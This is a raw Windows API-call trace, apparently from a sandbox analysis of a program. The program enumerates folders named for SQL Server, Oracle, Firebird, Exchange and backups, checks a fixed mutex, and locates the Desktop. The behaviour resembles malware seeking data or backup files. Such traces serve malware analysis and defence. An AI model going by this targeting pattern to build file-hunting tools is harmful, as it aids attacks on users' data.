lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@丬W企@\x18㢴X\x18;")) returned 0xffffffff [0103.883] GetLastError () returned 0x2 [0103.883] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.883] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=9, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0103.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=8, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\tion\\") returned 8 [0103.884] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\MSSQL.1", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@帜W企@\x18㤬X\x18D")) returned 0xffffffff [0103.884] GetLastError () returned 0x2 [0103.884] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=8, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="mssql.1\\ ") returned 8 [0103.884] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=37, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server Compact Edition\\") returned 37 [0103.885] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Microsoft SQL Server Compact Edition", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@嵤W企@\x18丬W\x18j")) returned 0xffffffff [0103.885] GetLastError () returned 0x2 [0103.885] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac08, cbMultiByte=37, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server compact edition\\icrosoft SQL Server Compact Edition\\") returned 37 [0103.885] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Adobe\\oft SQL Server Compact Edition\\") returned 6 [0103.886] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Adobe", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@令W企@\x18㢴X\x18q")) returned 0xffffffff [0103.888] GetLastError () returned 0x2 [0103.888] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.888] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="adobe\\丨W`") returned 6 [0103.888] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Oracle\\ft SQL Server Compact Edition\\") returned 7 [0103.888] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Oracle", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@側W企@\x18㤬X\x18y")) returned 0xffffffff [0103.889] GetLastError () returned 0x2 [0103.889] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.889] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="oracle\\X ") returned 7 [0103.889] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Archiveft SQL Server Compact Edition\\") returned 7 [0103.889] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Archive", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@嵤W企@\x18㢴X\x18\x81")) returned 0xffffffff [0103.889] GetLastError () returned 0x2 [0103.889] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="archiveX ") returned 7 [0103.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Backupeft SQL Server Compact Edition\\") returned 6 [0103.890] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Backup", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@令W企@\x18㤬X\x18\x88")) returned 0xffffffff [0103.890] GetLastError () returned 0x2 [0103.890] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="backup㢰X ") returned 6 [0103.890] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=6, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Reserveft SQL Server Compact Edition\\") returned 6 [0103.891] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Reserv", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@側W企@\x18㢴X\x18\x8f")) returned 0xffffffff [0103.891] GetLastError () returned 0x2 [0103.891] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.891] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=6, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="reserv㤨X ") returned 6 [0103.891] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=7, lpWideCharStr=0x18e458, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0103.891] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\Restore", lpFindFileData=0x18f20c | out: lpFindFileData=0x18f20c*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="V䱠@嵤W企@\x18㤬X\x18\x97")) returned 0xffffffff [0103.892] GetLastError () returned 0x2 [0103.892] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.892] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9b88, cbMultiByte=7, lpWideCharStr=0x18e410, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0103.892] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\", cchLength=0x36 | out: lpsz="c:\\program files\\microsoft sql server compact edition\\") returned 0x36 [0103.892] SHGetMalloc (in: ppMalloc=0x18f458 | out: ppMalloc=0x18f458*=0x767666bc) returned 0x0 [0103.892] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18f454 | out: ppidl=0x18f454) returned 0x0 [0103.893] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.894] SysReAllocStringLen (in: pbstr=0x18f4dc*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18f4dc*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0103.894] IMalloc:Free (This=0x767666bc, pv=0x578208) [0103.894] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0103.894] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0103.894] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.894] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.894] GlobalUnlock (hMem=0x45000c) returned 0 [0103.894] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.894] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.894] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.894] GlobalUnlock (hMem=0x45000c) returned 0 [0103.894] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.894] GlobalUnlock (hMem=0x450004) returned 0 [0103.894] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*", lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x56ed00 [0103.895] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.895] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0103.895] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0103.895] GetLastError () returned 0x12 [0103.895] FindClose (in: hFindFile=0x56ed00 | out: hFindFile=0x56ed00) returned 1 [0103.895] GlobalLock (hMem=0x450004) returned 0x588000 [0103.895] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.895] GlobalUnlock (hMem=0x450004) returned 0 [0103.895] GlobalLock (hMem=0x450004) returned 0x588000 [0103.895] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.895] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.895] GlobalUnlock (hMem=0x450004) returned 0 [0103.895] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.895] GlobalUnlock (hMem=0x45000c) returned 0 [0103.895] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*", lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x56ed00 [0103.896] FileTimeToLocalFileTime (in: lpFileTime=0x18f544, lpLocalFileTime=0x18f454 | out: lpLocalFileTime=0x18f454) returned 1 [0103.896] FileTimeToDosDateTime (in: lpFileTime=0x18f454, lpFatDate=0x18f512, lpFatTime=0x18f510 | out: lpFatDate=0x18f512, lpFatTime=0x18f510) returned 1 [0103.896] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.896] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.896] GlobalUnlock (hMem=0x45000c) returned 0 [0103.896] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.896] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.896] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.896] GlobalUnlock (hMem=0x45000c) returned 0 [0103.896] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.896] GlobalUnlock (hMem=0x450004) returned 0 [0103.896] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.896] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.896] FileTimeToLocalFileTime (in: lpFileTime=0x18f544, lpLocalFileTime=0x18f450 | out: lpLocalFileTime=0x18f450) returned 1 [0103.896] FileTimeToDosDateTime (in: lpFileTime=0x18f450, lpFatDate=0x18f512, lpFatTime=0x18f510 | out: lpFatDate=0x18f512, lpFatTime=0x18f510) returned 1 [0103.897] GlobalLock (hMem=0x450004) returned 0x588000 [0103.897] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.897] GlobalUnlock (hMem=0x450004) returned 0 [0103.897] GlobalLock (hMem=0x450004) returned 0x588000 [0103.897] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.897] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.897] GlobalUnlock (hMem=0x450004) returned 0 [0103.897] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.897] GlobalUnlock (hMem=0x45000c) returned 0 [0103.897] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.897] FindNextFileW (in: hFindFile=0x56ed00, lpFindFileData=0x18f530 | out: lpFindFileData=0x18f530*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0103.897] FileTimeToLocalFileTime (in: lpFileTime=0x18f544, lpLocalFileTime=0x18f450 | out: lpLocalFileTime=0x18f450) returned 1 [0103.897] FileTimeToDosDateTime (in: lpFileTime=0x18f450, lpFatDate=0x18f512, lpFatTime=0x18f510 | out: lpFatDate=0x18f512, lpFatTime=0x18f510) returned 1 [0103.897] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.897] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.897] GlobalUnlock (hMem=0x45000c) returned 0 [0103.897] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.897] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.897] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.897] GlobalUnlock (hMem=0x45000c) returned 0 [0103.897] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.898] GlobalUnlock (hMem=0x450004) returned 0 [0103.898] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.898] GlobalLock (hMem=0x450004) returned 0x588000 [0103.898] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.898] GlobalUnlock (hMem=0x450004) returned 0 [0103.898] GlobalLock (hMem=0x450004) returned 0x588000 [0103.898] GlobalLock (hMem=0x45000c) returned 0x58a010 [0103.898] GlobalHandle (pMem=0x588000) returned 0x450004 [0103.898] GlobalUnlock (hMem=0x450004) returned 0 [0103.898] GlobalHandle (pMem=0x58a010) returned 0x45000c [0103.898] GlobalUnlock (hMem=0x45000c) returned 0 [0103.898] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0103.898] SysReAllocStringLen (in: pbstr=0x18f450*=0x0, psz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5", len=0x3a | out: pbstr=0x18f450*="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5") returned 1 [0103.898] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.898] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.898] GlobalUnlock (hMem=0x45000c) returned 0 [0103.899] GlobalLock (hMem=0x45000c) returned 0x588000 [0103.899] GlobalLock (hMem=0x450004) returned 0x58a010 [0103.899] GlobalHandle (pMem=0x588000) returned 0x45000c [0103.899] GlobalUnlock (hMem=0x45000c) returned 0 [0103.899] GlobalHandle (pMem=0x58a010) returned 0x450004 [0103.899] GlobalUnlock (hMem=0x450004) returned 0 [0103.899] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Microsoft\\Exchange Server", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="䱈@庎W幢W企@\x18㮴V\x18\x1b")) returned 0xffffffff [0104.045] GetLastError () returned 0x3 [0104.045] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.045] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=26, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="microsoft\\exchange server\\\x1b") returned 26 [0104.045] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=21, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Microsoft SQL Server\\rver\\牡敩s") returned 21 [0104.046] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Microsoft SQL Server", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㸼V\x181")) returned 0xffffffff [0104.048] GetLastError () returned 0x2 [0104.048] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e4d2c0, cbMultiByte=21, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="microsoft sql server\\\x18\x15") returned 21 [0104.048] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=9, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="Firebird\\ SQL Server\\rver\\牡敩s") returned 9 [0104.048] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Firebird", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@庤W企@\x18㟄X\x18;")) returned 0xffffffff [0104.050] GetLastError () returned 0x2 [0104.050] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program files\\microsoft sql server compact edition\\v3.5\\") returned 0x3b [0104.050] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea99d8, cbMultiByte=9, lpWideCharStr=0x18e0d0, cchWideChar=2047 | out: lpWideCharStr="firebird\\") returned 9 [0104.051] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d99828, cbMultiByte=8, lpWideCharStr=0x18e118, cchWideChar=2047 | out: lpWideCharStr="MSSQL.1\\\\ SQL Server\\rver\\牡敩s") returned 8 [0104.051] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\MSSQL.1", lpFindFileData=0x18eecc | out: lpFindFileData=0x18eecc*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x58c020, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="᯹Ђ", cAlternateFileName="嵤W䱠@巬W企@\x18㤄X\x18D")) returned 0xffffffff [0104.053] GetLastError () returned 0x2 [0104.053] CharLowerBuffW (in: lpsz="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", cchLength=0x3b | out: lpsz="c:\\program 